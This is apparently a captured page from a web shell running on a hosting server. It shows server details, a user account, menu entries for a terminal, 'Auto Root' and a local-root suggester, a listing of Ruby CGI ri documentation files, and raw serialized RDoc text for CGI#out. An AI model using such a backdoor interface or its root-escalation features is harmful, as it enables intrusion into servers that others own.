Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
share /
ri /
2.0.0 /
system /
CGI /
Delete
Unzip
Name
Size
Permission
Date
Action
Cookie
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
HtmlExtension
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
InvalidEncoding
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
QueryExtension
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Session
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
accept_charset%3d-c.ri
347
B
-rw-r--r--
2023-07-26 17:38
accept_charset-c.ri
334
B
-rw-r--r--
2023-07-26 17:38
accept_charset-i.ri
318
B
-rw-r--r--
2023-07-26 17:38
cdesc-CGI.ri
13.45
KB
-rw-r--r--
2023-07-26 17:38
env_table-i.ri
282
B
-rw-r--r--
2023-07-26 17:38
escape-c.ri
427
B
-rw-r--r--
2023-07-26 17:38
escapeElement-c.ri
1.01
KB
-rw-r--r--
2023-07-26 17:38
escapeHTML-c.ri
465
B
-rw-r--r--
2023-07-26 17:38
escape_element-c.ri
314
B
-rw-r--r--
2023-07-26 17:38
escape_html-c.ri
305
B
-rw-r--r--
2023-07-26 17:38
header-i.ri
598
B
-rw-r--r--
2023-07-26 17:38
http_header-i.ri
4.84
KB
-rw-r--r--
2023-07-26 17:38
new-c.ri
2.67
KB
-rw-r--r--
2023-07-26 17:38
out-i.ri
2.63
KB
-rw-r--r--
2023-07-26 17:38
parse-c.ri
537
B
-rw-r--r--
2023-07-26 17:38
pretty-c.ri
800
B
-rw-r--r--
2023-07-26 17:38
print-i.ri
486
B
-rw-r--r--
2023-07-26 17:38
rfc1123_date-c.ri
492
B
-rw-r--r--
2023-07-26 17:38
stdinput-i.ri
283
B
-rw-r--r--
2023-07-26 17:38
stdoutput-i.ri
286
B
-rw-r--r--
2023-07-26 17:38
unescape-c.ri
471
B
-rw-r--r--
2023-07-26 17:38
unescapeElement-c.ri
720
B
-rw-r--r--
2023-07-26 17:38
unescapeHTML-c.ri
470
B
-rw-r--r--
2023-07-26 17:38
unescape_element-c.ri
320
B
-rw-r--r--
2023-07-26 17:38
unescape_html-c.ri
311
B
-rw-r--r--
2023-07-26 17:38
Save
Rename
U:RDoc::AnyMethod[iI"out:EFI"CGI#out;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I":Print an HTTP header and body to $DEFAULT_OUTPUT ($>);To:RDoc::Markup::BlankLine o:RDoc::Markup::List: @type: NOTE:@items[o:RDoc::Markup::ListItem:@label[I"+content_type_string+;T; [o; ; [I"AIf a string is passed, it is assumed to be the content type.;To;;[I"+headers_hash+;T; [o; ; [I"EThis is a Hash of headers, similar to that used by #http_header.;To;;[I"+block+;T; [o; ; [I"IA block is required and should evaluate to the body of the response.;T@o; ; [I"J<tt>Content-Length</tt> is automatically calculated from the size of ;TI".the String returned by the content block.;T@o; ; [I"GIf <tt>ENV['REQUEST_METHOD'] == "HEAD"</tt>, then only the header ;TI"His output (the content block is still required, but it is ignored).;T@o; ; [I"IIf the charset is "iso-2022-jp" or "euc-jp" or "shift_jis" then the ;TI"Kcontent is converted to this charset, and the language is set to "ja".;T@o; ; [I" Example:;T@o:RDoc::Markup::Verbatim; [,I"cgi = CGI.new ;TI"cgi.out{ "string" } ;TI"! # Content-Type: text/html ;TI" # Content-Length: 6 ;TI" # ;TI" # string ;TI" ;TI"(cgi.out("text/plain") { "string" } ;TI"" # Content-Type: text/plain ;TI" # Content-Length: 6 ;TI" # ;TI" # string ;TI" ;TI"#cgi.out("nph" => true, ;TI"2 "status" => "OK", # == "200 OK" ;TI"5 "server" => ENV['SERVER_SOFTWARE'], ;TI"& "connection" => "close", ;TI"* "type" => "text/html", ;TI", "charset" => "iso-2022-jp", ;TI"> # Content-Type: text/html; charset=iso-2022-jp ;TI"# "language" => "ja", ;TI": "expires" => Time.now + (3600 * 24 * 30), ;TI"1 "cookie" => [cookie1, cookie2], ;TI") "my_header1" => "my_value", ;TI"6 "my_header2" => "my_value") { "string" } ;TI" # HTTP/1.1 200 OK ;TI". # Date: Sun, 15 May 2011 17:35:54 GMT ;TI" # Server: Apache 2.2.0 ;TI" # Connection: close ;TI"7 # Content-Type: text/html; charset=iso-2022-jp ;TI" # Content-Length: 6 ;TI" # Content-Language: ja ;TI"1 # Expires: Tue, 14 Jun 2011 17:35:54 GMT ;TI" # Set-Cookie: foo ;TI" # Set-Cookie: bar ;TI" # my_header1: my_value ;TI" # my_header2: my_value ;TI" # ;TI" # string;T:@format0: @fileI"lib/cgi/core.rb;T:0@omit_headings_from_table_of_contents_below0I"Dcgi.out(content_type_string='text/html') cgi.out(headers_hash) ;TI"